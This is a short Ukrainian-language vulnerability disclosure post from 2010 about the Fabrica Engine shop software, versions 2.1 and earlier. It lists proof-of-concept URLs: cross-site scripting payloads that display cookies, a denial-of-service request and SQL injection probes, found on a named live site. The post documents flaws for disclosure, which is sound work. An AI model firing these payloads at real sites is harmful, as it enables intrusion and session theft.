Уразливості в Fabrica Engine
23:59 29.11.2010В 2008 та 2009 роках я знайшов Cross-Site Scripting, Denial of Service та SQL Injection уразливості в Fabrica Engine. Це комерційний движок для онлайн-магазинів. Дані уразливості я виявив на сайті matrix.ua. Про що найближчим часом повідомлю розробникам.
XSS:
http://site/search/?keyword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmin=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/search/?pmax=%3Cscript%3Ealert(document.cookie)%3C/script%3E
DoS:
http://site/search/?keyword=
SQL Injection:
http://site/search/?pmin=1%20and%20version()=5%20limit%201/*&keyword=1
http://site/search/?pmax=1%20and%20version()=5%20limit%201/*&keyword=1
Уразливі Fabrica Engine 2.1 та попередні версії.